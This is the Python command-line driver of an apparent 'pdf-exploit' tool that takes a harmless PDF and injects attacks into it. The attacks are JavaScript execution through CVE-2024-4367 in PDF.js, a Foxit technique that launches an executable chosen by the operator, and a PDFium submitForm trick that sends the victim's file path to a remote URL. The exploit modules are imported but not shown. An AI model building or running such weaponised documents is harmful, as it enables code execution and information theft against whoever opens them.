#! ./.venv/bin/python3
import argparse
from core import Pdf
from exploit import pdfjs, foxit, chrome
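def run():
    """Parse the command line, apply the selected techniques to a PDF, and save it.

    The input PDF (``-f``, optionally unlocked with ``-p``) is loaded once.
    Each technique whose option is present is then applied to that same
    object, in the fixed order pdfjs, foxit, chrome, so several can be
    combined in one output file. The result is written to ``-o``.

    The option values (the JavaScript string, the foxit executable and its
    arguments, the report URL) are handed to the technique classes exactly
    as typed; no validation of their content happens here.

    Exits through ``parser.error`` (status 2) when ``-o`` resolves to the
    same file as ``-f`` or when ``-foxit-args`` is given without
    ``-foxit-exec``.
    """
    import os

    parser = argparse.ArgumentParser(prog='pdf-exploit')
    parser.add_argument("-f", help="the harmless pdf path", required=True)
    parser.add_argument("-p", help="password", required=False)
    parser.add_argument("-o", help="the new pdf file", required=True)

    pdfjs_group = parser.add_argument_group(
        title="pdfjs", description="CVE-2024-4367")
    pdfjs_group.add_argument(
        "-pdfjs", help="javascript to be executed, example: alert(3)")

    foxit_group = parser.add_argument_group(
        title="foxit", description="foxit pdf 'flawed design' exploitation")
    foxit_group.add_argument("-foxit-exec", dest="foxit_exec")
    foxit_group.add_argument("-foxit-args", dest="foxit_args")

    chrome_group = parser.add_argument_group(
        title="chrome", description="use submitForm of pdfium to steal pdf file path and other information")
    chrome_group.add_argument(
        "-submitForm", help="The url to which the pdf path will be reported, example: http://127.0.0.1:9999")

    args = parser.parse_args()

    # Keep the unmodified input intact: the output must be a separate file so
    # the clean baseline and the modified sample can always be told apart.
    if os.path.realpath(args.f) == os.path.realpath(args.o):
        parser.error("-o must differ from -f; refusing to overwrite the input pdf")

    # -foxit-args is only consumed inside the -foxit-exec branch below, so on
    # its own it used to be dropped without any message.
    if args.foxit_args is not None and not args.foxit_exec:
        parser.error("-foxit-args requires -foxit-exec")

    pdf = Pdf(args.f, args.p)

    if args.pdfjs:
        print(f"[+] use the PDF.JS exploit: {args.pdfjs}")
        # NOTE(review): "./font.binary" is a relative path, so it is presumably
        # resolved against the current working directory rather than this
        # script's location - confirm in ExploitPdfjs.
        exp = pdfjs.ExploitPdfjs("./font.binary", args.pdfjs)
        exp.exploit(pdf)
        print("")

    if args.foxit_exec:
        print(
            f"[+] use the foxit exploit: {args.foxit_exec} {args.foxit_args}")
        exp = foxit.Foxit(args.foxit_exec, args.foxit_args)
        exp.exploit(pdf)
        print("")

    if args.submitForm:
        print(f"[+] use the chrome exploit: {args.submitForm}")
        exp = chrome.ChromePdfExploit(args.submitForm)
        exp.exploit(pdf)
        print("")

    print(f"[+] store to {args.o}")
    pdf.store(args.o)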
if __name__ == "__main__":
    # Run the command-line interface only when executed as a script, so that
    # importing this module has no side effects.
    run()